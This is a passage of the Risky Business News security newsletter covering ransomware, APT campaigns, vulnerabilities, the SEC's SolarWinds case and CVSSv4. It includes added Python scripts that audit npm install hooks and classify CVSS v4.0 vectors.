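The packages described above work because npm runs a dependency's preinstall, install and postinstall lifecycle scripts automatically during installation. The script below is an added example (not code from Phylum or from the npm project) of the check a reviewer can run over an installed node_modules tree: it lists every package that declares one of those hooks, together with the command, so the command can be read before it is trusted. The sample tree it builds is constructed for the demo and the package names in it are made up.

```python
"""Audit an installed node_modules tree for packages that run code at
install time.

Added example, not code from Phylum or from npm. The npm lifecycle hooks
preinstall, install and postinstall run automatically when a dependency
is installed. This script lists every package in a node_modules tree that
declares one of those hooks so a reviewer can read the command first.
The sample tree is constructed for the demo; its package names are made up.
"""
import json
import tempfile
from pathlib import Path

# Lifecycle scripts npm runs for a dependency during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")


def audit_install_scripts(node_modules: Path) -> list:
    """Return one finding per (package, hook) that declares an install script.

    Each finding is a dict with package name, hook, command and path.
    Unreadable or malformed package.json files are skipped so that one
    broken manifest does not abort the whole audit.
    """
    findings = []
    for manifest in sorted(Path(node_modules).rglob("package.json")):
        try:
            data = json.loads(manifest.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue
        if not isinstance(data, dict):
            continue
        scripts = data.get("scripts")
        if not isinstance(scripts, dict):
            continue
        for hook in INSTALL_HOOKS:
            command = scripts.get(hook)
            if isinstance(command, str) and command.strip():
                findings.append({
                    "package": data.get("name") or manifest.parent.name,
                    "hook": hook,
                    "command": command,
                    "path": str(manifest),
                })
    return findings


def build_sample_tree() -> Path:
    """Create a throwaway node_modules tree with constructed packages."""
    root = Path(tempfile.mkdtemp(prefix="nm-audit-")) / "node_modules"
    packages = {
        # A normal library: no lifecycle scripts at all.
        "sample-clean-lib": {"name": "sample-clean-lib", "version": "1.0.0"},
        # A scoped package with an ordinary test script only.
        "@sample/scoped-lib": {"name": "@sample/scoped-lib", "version": "2.1.0",
                               "scripts": {"test": "node test.js"}},
        # A package that runs code as soon as it is installed.
        "sample-suspicious-lib": {"name": "sample-suspicious-lib", "version": "0.0.3",
                                  "scripts": {"postinstall": "node setup.js"}},
    }
    for directory, manifest in packages.items():
        pkg_dir = root / directory
        pkg_dir.mkdir(parents=True)
        (pkg_dir / "package.json").write_text(json.dumps(manifest), encoding="utf-8")
    # A manifest that is not valid JSON must not break the audit.
    broken = root / "sample-broken-lib"
    broken.mkdir()
    (broken / "package.json").write_text("{not json", encoding="utf-8")
    return root


if __name__ == "__main__":
    tree = build_sample_tree()
    for f in audit_install_scripts(tree):
        print(f"{f['package']}: {f['hook']} -> {f['command']}")
```

Pointing `audit_install_scripts` at a real project's `node_modules` directory gives the list to review. Installing with `npm install --ignore-scripts` blocks these hooks outright, but some legitimate packages (native add-ons, for instance) need them, so an audit of what would run is the more practical control in most environments.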

Google Cloud Threat Horizons Report #8: In the eighth edition of its threat and trends report [PDF], the Google Cloud security team highlighted a tactic it calls Multi-Software-as-a-Service Cloud Exploitation, where threat actors take credentials from one compromised cloud system to expand to multiple SaaS platforms an organization might be using.

RTF global ransomware: The Ransomware Task Force has published its yearly report on ransomware attacks for 2022. Last year, the organization says it tracked 2,600 ransomware incidents, down from the 3,000 it tracked the year before.

"This finding is consistent with the findings of other research institutions throughout 2022. While it is unlikely that a single force is driving this decline, the Russian invasion of Ukraine, law enforcement action, and continued efforts within the security community have almost certainly been contributing factors in this decline. Yet, early indications are that ransomware incidents in 2023 will reverse this decline."

SWAT USA Drop Service: Infosec reporter Brian Krebs takes a look at SWAT USA Drop Service, an online service used by money laundering gangs to buy expensive products with stolen funds and ship them overseas to be resold and re-monetized by hackers. Krebs got a copy of the site's database after the service was recently hacked. Hooray for hackers! [Additional coverage in KrebsOnSecurity]

White Proxies: An investigation by the Qurium Media Foundation has found that proxy provider White Proxies (or White Solutions) has provided the server infrastructure used in DDoS attacks against independent news outlets in Hungary. The attacks took place in August and targeted more than 40 Hungarian news outlets that criticized the country's government and the ruling party. The biggest attacks took place in August, shortly after journalists at several outlets exposed government corruption. The International Press Institute says that more than 40 Hungarian independent news outlets faced DDoS attacks since April this year. Shortly after this report, IPI itself was targeted by a DDoS attack.

Malware technical reports

Megazord: Chinese security firm Qihoo 360 analyzes Megazord, a new version of the Akira ransomware. Another report is also available via Rising.

Knight ransomware: Fortinet researchers look at Knight, a ransomware gang that started operations in August this year and has had quite an impact in Italy. The ransomware is a rebrand of the old Cyclops gang.

GhostLocker: Uptycs looks at GhostLocker, a RaaS created by the GhostSec "hacktivist" group.

"By executing the specified C2 hunting query on Shodan, the Uptycs threat intelligence team uncovered additional IP addresses associated with GhostLocker's Affiliate Login panel."

There goes their anonymity, I guess!

Kinsing: AquaSec has spotted the Kinsing crypto-mining botnet exploiting the Looney Tunables vulnerability to elevate privileges on compromised Linux boxes.

BadCandy: Cisco Talos has published a technical analysis of BadCandy, the implant deployed on Cisco IOS XE routers via the two recent zero-days CVE-2023-20198 and CVE-2023-20273. Talos says the malware is now at v3, showing that threat actors are still actively modifying their attacks and malware to maintain access to the compromised boxes. The latest v3 modifications appear to have worked, as the Shadowserver Foundation has stopped detecting infected systems.

Socks5Systemz: A malware strain named Socks5Systemz has infected more than 10,000 Windows systems as part of a proxy rental service. The Socks5Systemz malware is typically installed as a second-stage payload on systems previously infected with the PrivateLoader or Amadey malware. According to security firm BitSight, the botnet has been live since 2016 and appears to be operated out of Russia.

DarkGate: eSentire researchers have spotted a new version of the DarkGate malware loader. Also, see a similar report from Netskope.

AsyncRAT: McAfee looks at a campaign spreading the AsyncRAT using a new infection chain.

Millenium RAT: CyFirma published a report on Millenium, a Windows remote access trojan derived from the ToxicEye RAT open-source project.

Sponsor Demo

Senior Sales Engineer Ali Cheikh demonstrates the runZero platform to Risky Business host Patrick Gray. runZero is a cyber asset management tool that combines active scanning, passive discovery, and API integrations to discover IT, OT, and IoT assets (both managed and unmanaged) across your network, including cloud, mobile, and remote environments.

APTs and cyber-espionage

Operation Covert Stalker: AhnLab has published a technical report [English] on Operation Covert Stalker, a Kimsuky spear-phishing campaign that lasted for roughly 17 months and targeted people and organizations working in North Korean politics, diplomacy, and security.

APT35 and Emennet Pasargad bounty: The US State Department has put up $10 million rewards for information on two Iranian cyber groups. The first reward is for information on members of APT35, a known cyber-espionage group that has carried out ransomware attacks against US critical infrastructure. The second reward is for Emennet Pasargad, an Iranian cybersecurity company that spread disinformation and tried to influence voters in the 2020 US Presidential Election.

Vulnerabilities, security research, and bug bounty

LLM prompt injection attacks: WithSecure and Nettitude go over various LLM prompt injection attacks that can poison AI models to modify agent output.

TeslaMate exposure: A security researcher has found ~1,000 TeslaMate dashboards exposed on the internet.

Atlassian data-wiping bug mass-exploitation: The Shadowserver Foundation warns that mass internet scans are underway for Atlassian Confluence servers that may be vulnerable to a major data-wiping vulnerability (CVE-2023-22518). The scans began after a public exploit was posted online last week. Atlassian has confirmed the exploit and urged customers once again to apply patches. In a rare statement last week, Atlassian CISO Bala Sathiamurthy urged customers to patch their Confluence servers as soon as possible and avoid potential data loss.

ActiveMQ bug was a zero-day: Security researchers at ArcticWolf and Huntress Labs say that a recently patched Apache ActiveMQ vulnerability had been under attack for more than two weeks before a patch was available. The two companies say they've found attacks against ActiveMQ servers as far back as October 10, long before Apache patched the vulnerability on October 25. Several security firms have seen hacked ActiveMQ servers encrypted with a version of HelloKitty, a ransomware family that was leaked online in October. ArcticWolf says it has also seen some servers encrypted with the TellYouThePass ransomware.

Unpatched Exchange vulnerabilities: ZDI security researcher Piotr Bazydlo says Microsoft has declined to patch four vulnerabilities in its Microsoft Exchange email server. The vulnerabilities include three SSRF issues and one remote code execution bug. Bazydlo says that given the nature of the four security flaws and Microsoft's refusal to release patches, the only mitigation he can recommend is to restrict access to Exchange servers. Microsoft did not elaborate on why it chose not to patch the issues, but ZDI bug reports contain some pretty strict exploitation requirements, such as access to an email account's credentials.

Infosec industry

BlackHatEurope keynote: UK NCSC CTO Ollie Whitehouse and former Uber CISO Joe Sullivan will keynote the Black Hat Europe security conference in December.

New tool—Cuddlephish: Security researcher Forrest Kasler has open-sourced a tool named Cuddlephish that can be used to execute Browser-in-the-Middle phishing attacks.

Global cybersecurity workforce: The global cybersecurity workforce is estimated to have reached more than 5.5 million professionals. Although the number is 9% higher than last year, 4 million experts are still needed worldwide to fill open positions across the industry. Latin America, Australia, and the Middle East have the biggest cybersecurity workforce gaps to fill, according to a study from cybersecurity certification platform ISC2 [PDF]. [Additional coverage in CybersecurityDive]

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq discuss what is really at stake when it comes to cyber security.

Risky Biz News: New CVSSv4 vulnerability scoring system is out

3 November 2023 at 01:30

This newsletter is brought to you by vulnerability management and analysis platform Nucleus Security. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:

The Forum of Incident Response and Security Teams (FIRST) has officially released a new version of the Common Vulnerability Scoring System (CVSS), the most widely used standard for rating the severity of software vulnerabilities using a score from 1 to 10.

With this week's release, the standard has now reached version 4.0—also more commonly known as CVSSv4.

Work on this new version began years ago and comes after a period of public comments and feedback and after a first CVSSv4 draft was presented in June at the FIRSTcon 2023 security conference.

Image via Rapid7

There are several new additions in CVSSv4 that expand CVSSv3.1, the standard that has been in use for the past several years. The four most important ones are below:

  • New CVSS scoring metrics have been added to improve the granularity of CVSS scores. This was done because in previous versions of the standard, you'd end up with different types of vulnerabilities bunched around the same score that didn't particularly reflect each one's severity. More scoring metrics in CVSSv4 means a better spread across the whole scale.

  • There are now ICS, OT, and IoT-specific scoring metrics. This includes scoring metrics such as "Safety," "Automatable," or "Recovery," which will let critical infrastructure operators know if a security flaw just looks bad on paper or if it's actually exploitable and dangerous to their networks.

  • New scoring metrics such as "Value Density," "Vulnerability Response Effort," and "Provider Urgency" have been added to help responders evaluate and prioritize vulnerabilities. The last two are particularly interesting since they allow vendors to tell customers that a vulnerability needs to be patched ASAP. This is a capability that was not present in the current CVSS.

  • The "Temporal" metrics group from CVSSv3 has been replaced with a new group called "Threat Metrics." Just like the previous one, this group deals with exploitability and proof-of-concept availability but is way easier and clearer.

Because of all these changes, CVSSv4 also changes how vulnerabilities are scored. While in previous versions most CVSS scores were the "base score," CVSSv4 has four types of scores, depending on which groups of "metrics" apply to a vulnerability. The four new CVSS score types are listed below. Use the image below to understand how they are calculated.

  • CVSS-B: CVSS Base Score

  • CVSS-BT: CVSS Base + Threat Score

  • CVSS-BE: CVSS Base + Environmental Score

  • CVSS-BTE: CVSS Base + Threat + Environmental Score

Image via Nucleus Security

As with most previous editions, CVSSv4 also comes with its own score calculator. You can probably see the differences between CVSSv3.1 and CVSSv4 just by looking at the metrics groups.

If that's not enough, BASE4 Security, Rapid7, Qualys, and Tenable published deep dives into the new standard earlier this year that will help you navigate all the changes. Nucleus Security (by coincidence, this week's sponsor) also published a YouTube video going over the new CVSSv4 changes back in June. Probably the best description of the new CVSSv4 standard comes from BASE4's write-up, which describes it as a "pursuit of precision."
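The four score types above follow directly from which metric groups a vector string carries. As an added example that is not code from the newsletter, from FIRST, or from any of the vendors cited, the script below parses a CVSS v4.0 vector, validates that the eleven Base metrics are present, and reports whether the vector is a CVSS-B, CVSS-BT, CVSS-BE or CVSS-BTE, plus any Supplemental metrics (Safety, Automatable, Recovery, Value Density, Vulnerability Response Effort, Provider Urgency) it carries. The metric abbreviations are the ones in the CVSS v4.0 specification; the function names and sample vectors are this example's own. It deliberately does not compute a numeric score, which requires the specification's lookup tables.

```python
"""Classify a CVSS v4.0 vector string by the metric groups it carries.

Added example, not code from the newsletter or from FIRST. It shows how
the four CVSSv4 score types (CVSS-B, CVSS-BT, CVSS-BE, CVSS-BTE) follow
from which metric groups a vector carries. Metric abbreviations are those
of the CVSS v4.0 specification; function names and sample vectors are this
example's own. No numeric score is computed: that needs the specification's
MacroVector lookup tables, which are not reproduced here.
"""

# Metric groups as named in CVSS v4.0. "X" (Not Defined) is the default
# for Threat, Environmental and Supplemental metrics, so a metric set to
# X is treated as absent.
BASE_METRICS = ("AV", "AC", "AT", "PR", "UI",
                "VC", "VI", "VA", "SC", "SI", "SA")
THREAT_METRICS = ("E",)                      # Exploit Maturity
ENVIRONMENTAL_METRICS = ("CR", "IR", "AR",   # C/I/A requirements
                         "MAV", "MAC", "MAT", "MPR", "MUI",
                         "MVC", "MVI", "MVA", "MSC", "MSI", "MSA")
SUPPLEMENTAL_METRICS = ("S", "AU", "R", "V", "RE", "U")
KNOWN_METRICS = (BASE_METRICS + THREAT_METRICS
                 + ENVIRONMENTAL_METRICS + SUPPLEMENTAL_METRICS)
NOT_DEFINED = "X"


def parse_vector(vector: str) -> dict:
    """Split a CVSS:4.0 vector into {metric: value}, validating structure.

    Raises ValueError for a wrong prefix, a malformed or duplicated
    metric, an unknown metric name, or a missing Base metric.
    """
    parts = vector.strip().split("/")
    if parts[0] != "CVSS:4.0":
        raise ValueError(f"not a CVSS v4.0 vector: {vector!r}")
    metrics = {}
    for item in parts[1:]:
        name, sep, value = item.partition(":")
        if not sep or not name or not value:
            raise ValueError(f"malformed metric: {item!r}")
        if name not in KNOWN_METRICS:
            raise ValueError(f"unknown metric: {name!r}")
        if name in metrics:
            raise ValueError(f"duplicate metric: {name!r}")
        metrics[name] = value
    missing = [m for m in BASE_METRICS if m not in metrics]
    if missing:
        raise ValueError("missing Base metrics: " + ", ".join(missing))
    return metrics


def _group_present(metrics: dict, group: tuple) -> bool:
    """True if any metric of the group is set to something other than X."""
    return any(metrics.get(m, NOT_DEFINED) != NOT_DEFINED for m in group)


def score_type(metrics: dict) -> str:
    """Return CVSS-B, CVSS-BT, CVSS-BE or CVSS-BTE for parsed metrics."""
    suffix = "B"
    if _group_present(metrics, THREAT_METRICS):
        suffix += "T"
    if _group_present(metrics, ENVIRONMENTAL_METRICS):
        suffix += "E"
    return "CVSS-" + suffix


def supplemental(metrics: dict) -> dict:
    """Supplemental metrics that were supplied (they never change the score).

    They carry context for the consumer, e.g. Provider Urgency or
    Automatable, which is what the ICS/OT-oriented additions rely on.
    """
    return {m: v for m, v in metrics.items()
            if m in SUPPLEMENTAL_METRICS and v != NOT_DEFINED}


def classify(vector: str) -> tuple:
    """Convenience wrapper: (score type, supplemental metrics) for a vector."""
    metrics = parse_vector(vector)
    return score_type(metrics), supplemental(metrics)


if __name__ == "__main__":
    # Constructed sample vectors, not taken from any real advisory.
    samples = [
        "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
        "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:A",
        "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:H",
        "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
        "/E:P/MAV:A/AU:Y/S:P/RE:H",
    ]
    for v in samples:
        kind, extra = classify(v)
        print(kind, extra, v)
```

The third sample shows the one subtlety worth remembering: a metric explicitly set to X (Not Defined) is the same as leaving it out, so a vector that spells out E:X but supplies CR:H is a CVSS-BE, not a CVSS-BTE.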

Breaches, hacks, and security incidents

Advarra hack: A threat actor claims to have hacked and exfiltrated data from Advarra, a major provider of IT services to the US healthcare sector. The attack took place on October 25. The threat actor says they plan to leak the data after the company has refused to negotiate or pay a ransom. The attack has been claimed by one of the AlphV ransomware affiliates, and the company's name was listed on the AlphV dark web leak site on November 1. [Additional coverage in DataBreaches.net]

Boeing ransomware attack: Airplane maker and defense contractor Boeing has confirmed that a ransomware attack has impacted its parts and distribution business. The LockBit ransomware gang first listed Boeing's name on its dark web leak site on October 27 before the company admitted to the incident. The gang claimed it accessed Boeing's network using an unnamed zero-day. [Additional coverage in DarkReading]

Onyx Protocol crypto-heist: A threat actor has stolen $2.1 million worth of crypto assets from DeFi platform Onyx Protocol. The attacker used an illiquidity market exploit to manipulate interest rates and steal funds from the platform's wallets. According to blockchain security firm SlowMist, the same exploit was also used to steal $7.4 million from the now-defunct Hundred Finance platform back in April.

General tech and privacy

Microsoft Secure Future Initiative: Microsoft President Brad Smith has made a public pledge that Microsoft will improve the security of its cloud products. Named the Secure Future Initiative, the company's commitment comes after hackers have constantly exploited Microsoft products for attacks on government and private sector entities. Smith says the initiative will focus on three areas—the use of AI for cyber defense, fundamental changes to software engineering, and advocacy for stronger international norms. The new initiative wants to mimic a similar pledge made by Bill Gates in 2002. Named Trustworthy Computing, that initiative led to significant changes to Microsoft's security posture and the creation of what we now know as Patch Tuesday.

Microsoft Secure Future Initiative (the engineering part): As part of Microsoft's latest SFI effort, Charlie Bell, Executive Vice President of Microsoft Security, has published a blog post describing what the changes to the company's software engineering practices will entail. The effort will primarily focus on improving the company's cloud services and will center around 1) transforming software development, 2) implementing new identity protections, and 3) a faster response to cloud vulnerability reports. Microsoft will also change its signing key infrastructure, which was compromised earlier this year by a group of Chinese state-sponsored hackers.

YouTube's ad-blocking crusade: Google has confirmed that it launched a "global effort" to crack down on the use of ad blockers on YouTube. The company seems to be set in its ways: it intends to bombard users with ads and prevent people with ad blockers from accessing its site. According to previous reporting, the company plans to force users to either view ads or subscribe to YouTube Premium. Those who use an ad blocker will have access to the site restricted.

New ING TLD: Google has launched a new top-level domain named ING. Because of the way the TLD was set up, all new domains must use HTTPS.

EU bans Meta's data processing: The European Data Protection Board has banned social media company Meta from processing and using the data of EU users for targeted advertising. The decision applies to all Meta sites, such as Facebook, Instagram, WhatsApp, and adjacent advertising services. The EDPB says Meta has failed to obtain the explicit consent of EU users to use their data for targeted ads. The EDPB imposed an EU-wide ban at the request of the Norwegian data protection agency, which has been investigating the company's abuses for months.

eIDAS open letter: More than 300 cybersecurity experts, researchers, and NGOs have signed an open letter asking the European Union to drop its new eIDAS (Electronic Identification, Authentication and Trust Services) regulations. Experts say new articles will force web browsers to automatically trust certificate authorities and cryptographic keys mandated by EU governments. Experts say these changes open the door to mass surveillance and the interception of encrypted web traffic across the EU. The latest modifications were adopted behind closed-door meetings and added to the eIDAS text without public debate. Signatories include Mozilla, the EFF, the Linux Foundation, Cloudflare, Fastly, and multiple VPN providers.

GoGuardian privacy invasion: An EFF investigation has found that the GoGuardian student surveillance software regularly flags innocuous websites as harmful content. The GoGuardian software is used by thousands of schools to monitor the internet traffic of more than 27 million K-12 students across the US. The EFF says GoGuardian is plagued by false positives that often flag benign educational or informative websites as harmful or sexually explicit and then report these non-existent issues to the students' schools and parents, creating unneeded stress for the monitored children.

HBO troll accounts: A Rolling Stone investigation has found that HBO executives used networks of Twitter trolls to harass TV critics who gave poor reviews of their shows.

Avast SDK bug: Avast says a bug in its SDK is to blame for Google apps being flagged as malware on Huawei and other Chinese phones.

Chrome 119: Google has released version 119 of its Chrome browser. See here for security patches and webdev-related changes. Major changes include that all cookies now have an expiration date capped at 400 days. This applies to newly set cookies and has also been applied retroactively to existing ones. On mobile, Chrome has ended support for Android Nougat (7.0). WebSQL has also been disabled and will be removed in v123. Chrome can now also sync Tab Groups.

Government, politics, and policy

China cracks down on social media stars: Seven of China's top social media platforms have jointly announced that users with more than 500,000 followers will have to list their real names in their profiles. The move is meant to deter social media stars from criticizing the government or meddling in global or national affairs. It also comes after China's Central Cyberspace Affairs Commission ordered online platforms to crack down on accounts spreading rumors or fake news. Accounts that do not reveal their real name will be demonetized and restricted. The seven platforms that notified users of the new rule include Baidu, Sina Weibo, WeChat, Douyin (TikTok), Kuaishou, Bilibili, and Xiaohongshu. [Additional coverage in GlobalTimes]

CRI summit: The White House has published the results of the third meeting of the International Counter Ransomware Initiative (CRI).

The Bletchley Declaration: Twenty-eight countries and the European Union have signed the Bletchley Declaration, a document agreeing to cooperate on the safe development of AI technologies.

Sponsor section

In this Risky Business News sponsor interview, Catalin Cimpanu talks with Patrick Garrity, VP of Marketing and security researcher at Nucleus Security, on the rise and evolution of vulnerability threat intel and how CISA KEV's new ransomware section will be a game changer.

Cybercrime and threat intel

Two Russian hackers detained: The Russian FSB has detained two men this week on accusations of carrying out cyberattacks against Russian IT systems on behalf of Ukraine. Officials detained a student from Tomsk and a 36-year-old from Belovo, Kemerovo. The FSB says the two suspects joined Ukraine's "cyber troops," received orders from Ukraine's security services, and attacked Russian critical infrastructure. The two have been charged with high treason and face prison sentences from 12 years to life in prison.

Israel-Hamas hacktivism: The number of hacktivist groups involved in the Israel-Hamas conflict has now reached 137, surpassing the 128 groups involved in the Russian-Ukrainian conflict. According to threat intelligence analyst CyberKnow, most of the groups are from Asia and have sided with the Hamas/Palestinian side. Most of the groups are carrying out DDoS attacks and website defacements. Some groups have been involved in hack-and-leak operations, but many of the hacks have proven to be fake.

Mozi botnet goes down: The Mozi botnet has finally gone down for good after a mysterious entity removed its malware from infected IoT devices across the globe. The removal took place at the end of August, with infected hosts being first removed from systems in India and then from China. Security firm ESET says the Mozi takedown was executed with a special killswitch component that was signed with the malware's original private key. The company couldn't say if the killswitch was activated by the Mozi botnet creators or by Chinese law enforcement, which detained some of the Mozi authors in June 2021. First spotted in November 2019, the botnet infected more than 1.5 million devices across its lifetime, peaking at 160,000 infected systems in September 2020.

Wiki-Slack Attack: eSentire researchers have discovered that you can use Wikipedia links to redirect Slack users to malicious sites in what they're calling the Wiki-Slack Attack.

Malware technical reports

MoneyMessage ransomware: Sophos has some details on the new-ish MoneyMessage, a ransomware gang targeting corporate networks.

SparkRAT: OALABS has published IOCs for SparkRAT, a Go-based remote access trojan spotted being abused by a Chinese threat actor.

DarkGate: Netskope researchers have spotted a new version of the DarkGate malware loader.

Blister: NCC Group has a deep dive into recent versions of the Blister malware loader, previously linked to Evil Corp.

BlackCat/AlphV: NCC Group has published IOCs from recent BlackCat/AlphV intrusions.

Sponsor Demo

Nucleus Security's COO Scott Kuffer shows Risky Business podcast host Patrick Gray their vulnerability management platform. It ingests scan outputs from a number of vulnerability identification tools, normalizes that information, and then allows vulnerability management teams to do things like assign responsibility for certain types of bugs to the correct people.

APTs and cyber-espionage

Kimsuky's FastViewer: S2W researchers have analyzed a new version of FastViewer, an Android malware strain previously used by the Kimsuky North Korean APT.

MuddyWater: DeepInstinct and Group-IB are tracking a MuddyWater spear-phishing campaign targeting Israeli entities.

Mysterious WhatsApp spy mod: Kaspersky has looked at a WhatsApp mod that contained a version of the CanesSpy spyware. The mod was being distributed to Arabic-speaking users via Telegram channels. It is unclear which threat actor was behind it, but the operation is most likely related to espionage and intelligence collection.

Vulnerabilities, security research, and bug bounty

SketchUp vulnerabilities: Zscaler researchers have discovered 117 vulnerabilities across the Microsoft 365 application suite related to support for 3D file formats. Zscaler says all the bugs originate from a library that supports the SketchUp (SKP) 3D format that Microsoft added in June 2022. Because of the large number of bug reports it received from Zscaler and other researchers, Microsoft temporarily disabled support for the SKP format across all Microsoft 365 apps in June this year.

Thorn SFTP vulnerabilities: Praetorian researchers have found a vulnerability (CVE-2023-47174) in Thorn SFTP Gateway Admin portals. The bug is a Java deserialization issue that can be used to execute malicious code on unpatched file-transfer systems.

WhatsApp vulnerabilities: Meta's security team has patched two vulnerabilities in the WhatsApp service. Tracked as CVE-2023-38537 and CVE-2023-38538, the two are the first security issues patched in WhatsApp this year. Both were discovered by the company's security teams.

Signal PQXDH security audit: A team of security experts has analyzed Signal's new post-quantum protocol, PQXDH.

CitrixBleed exploitation: Google's Mandiant division says it is now tracking four different threat actors exploiting the CitrixBleed vulnerability (CVE-2023-4966) to compromise corporate and government systems. At least two of these are ransomware gangs. The first attacks targeting the vulnerability were recorded at the end of August when the bug was still an unpatched zero-day. They expanded last week after free exploits were posted online.

Apache ActiveMQ exploitation: Security firms Rapid7, Censys, and the Shadowserver Foundation are reporting exploitation of a recently patched Apache ActiveMQ vulnerability tracked as CVE-2023-46604. The vulnerability was patched at the end of October, and attacks began after proof-of-concept exploit code was published online. The vulnerability is a pre-auth RCE with a severity of 10/10. According to Censys and Shadowserver, there are between 7,000 and 8,000 ActiveMQ servers currently connected to the internet. Rapid7 says some of the hacked servers were encrypted with a version of HelloKitty, a ransomware family whose source code was leaked online in October.

ApatchMe vulnerability: Tenable researchers say that Apache Airflow instances on Amazon and Google’s cloud services are running a vulnerable version of the software. According to researchers, the servers are vulnerable to a stored XSS bug tracked as CVE-2023-29247 and also known as ApatchMe.

Vulnerable kernel drivers: VMware Carbon Black researchers have identified 34 vulnerable kernel drivers that can be used to elevate the access of non-admin users. VMware says it reported the issues to vendors whose drivers had valid signatures at the time of discovery, but only two fixed the reported issues.

Cisco security updates: Cisco has released or updated 25 security advisories for various products, including an advisory for two recently exploited zero-days. There is also a security update for a critical vulnerability the company tracks as CVE-2023-20048, a command injection bug in Firepower firewalls.

Infosec industry

Group-IB US expansions: After finishing its exit from the Russian market, security firm Group-IB says it's preparing for a US expansion. In today's political context, allow me to be extremely skeptical about this one.

Splunk layoffs: Security firm Splunk has laid off approximately 7% of its workforce, representing around 550 of its 8,000 total staff. CEO Gary Steele says the layoffs are part of its agreement with Cisco, which agreed to buy Splunk for $28 billion. This is Splunk's second round of layoffs this year after it also fired 4% of its staff back in January.

Acquisition news: Proofpoint has entered into an agreement to buy cloud email security company Tessian.

"The agreement is expected to close in late 2023 to early 2024, subject to customary closing conditions and required regulatory approvals."

New tool—Raven: Security firm Cycode Labs has open-sourced a tool named Raven that can perform massive scans on GitHub Actions CI/CD workflows and report the presence of vulnerabilities and other issues.

New tool—LdrLockLiberator: Security researcher Elliot Killick has open-sourced a tool named LdrLockLiberator that can unlock locked DLLs and perform DLL hijacks.

New tool—Tetragon: Cloud security firm Cilium has open-sourced Tetragon, an eBPF-based security solution for Kubernetes environments.

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq discuss what is really at stake when it comes to cyber security.

Risky Biz News: SEC charges SolarWinds and its CISO

1 November 2023 at 01:30

This newsletter is brought to you by vulnerability management and analysis platform Nucleus Security. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:

The US Securities and Exchange Commission has filed fraud charges against software company SolarWinds and its chief information security officer, Timothy Brown.

The agency says it reviewed internal communications and security assessments and found that SolarWinds lied about its cybersecurity posture to investors for years before it was hacked in 2020.

The SEC says that for at least two years before the hack, the company—through its CISO—had learned and discussed its cybersecurity deficiencies but misrepresented the risks to investors.

Gurbir S. Grewal, the Director of the SEC's Division of Enforcement, says SolarWinds and Brown ignored "repeated red flags" and mentioned "only generic and hypothetical risks" in its public documents.

The SEC's lawsuit [PDF] comes with tens of pages listing a long list of SolarWinds cybersecurity and risk assessment deficiencies that paint an extremely grim picture of the company's internal culture.

  • Failure to consistently maintain a secure development lifecycle (SDL) for its software

  • Failure to enforce the use of strong passwords on all systems

  • Failure to remedy access control problems that persisted for years

  • Failure to fix vulnerabilities in its software in time

  • Understaffing of its cybersecurity roles

The SEC lawsuit points the finger at Brown for the company's cybersecurity issues. It also reveals that Brown lied to cybersecurity firms investigating the hack. This may not be a crime, but it obviously helped the SEC understand how SolarWinds was treating its cybersecurity obligations.

The company's hack eventually came to light in December 2020 after Mandiant's and Microsoft's security teams discovered suspicious activity coming from their SolarWinds Orion servers.

The two companies started investigations and discovered that hackers linked to Russia's SVR intelligence agency—known as the APT29 group—broke into SolarWinds' network in early 2019 and inserted malware into the company's Orion software. Through the Orion software update mechanism, the malware made its way to more than 18,000 corporate and government networks across the world, including several US federal agencies.

The SEC is not suing SolarWinds for bad security practices—otherwise, many companies and their CISOs would be already fined into the ground—but for lying to its investors.

The agency says investors lost money after SolarWinds' share price dropped by 25% when it disclosed its hack—a financial risk none were aware of at the time because SolarWinds never shared a real picture of its cybersecurity issues.

This week's charges are not a surprise since the SEC notified SolarWinds about its intention to bring charges on two separate occasions, in November 2022 and June 2023. The surprise came from the content of the SEC's complaint, which may spur a new wave of lawsuits against the company.

In the SEC's press release, Grewal says the lawsuit should be interpreted as a "strong message" to other companies to get serious about their cybersecurity practices.

The agency is seeking relief and disgorgement from SolarWinds and a bar for Brown from serving as an officer or director in other companies.

In cybersecurity circles, the case is expected to have an impact, but not the one the SEC is expecting. Because the SEC case revolves around many of SolarWinds' internal documents and chats, security experts expect to see companies record cybersecurity issues far less and only when they have to.

We've seen this in ransomware-related incidents already. Following a string of class-action lawsuits, legal teams hired to advise ransomed companies are now telling victimized orgs to not produce incident response or similar cybersecurity reports. Any such reports are to be delivered in spoken form and kept off any electronic or paper documents as much as possible since they can be subpoenaed in future lawsuits and may reveal the company to be at fault.

Having your internal security audits, emails, and Slack chats appear in an SEC lawsuit is a good reason not to have them lying around—unless some regulations and contracts specifically require a security audit to be carried out once in a blue moon.

Brown's inclusion in the SEC lawsuit is also having an impact across the CISO/CSO space, raising the same issues we've heard before about having the right person in the role and that security compliance does not mean security—both good points. Unfortunately, these opinions and the SEC lawsuit miss one important detail, namely, whether Brown had any significant power or sway inside SolarWinds' board. He probably did not.

SolarWinds CFO Barton Kalsu, who was targeted in one of the Wells notices, was not charged this week.

Breaches, hacks, and security incidents

MOVEit victim count passes 2.5K: The number of companies impacted by Clop's MOVEit hacking spree has formally surpassed 2,500, according to security firm Emsisoft. The latest organizations to be added to this list are Avast's CCleaner app and the US Justice and Defense departments. The US DOJ and DoD incidents are not as bad as they look, though, as officials say the hackers only gained access to the email addresses of 632,000 US federal employees and nothing more.

Major ransomware incident in Germany: A suspected ransomware attack on a German IT company has crippled local government systems across western Germany. According to German officials, the attack hit a company named Südwestfalen IT. The number of affected municipalities is unknown, but most are small towns located in Germany's North Rhine-Westphalia region. [Additional coverage in BILD]

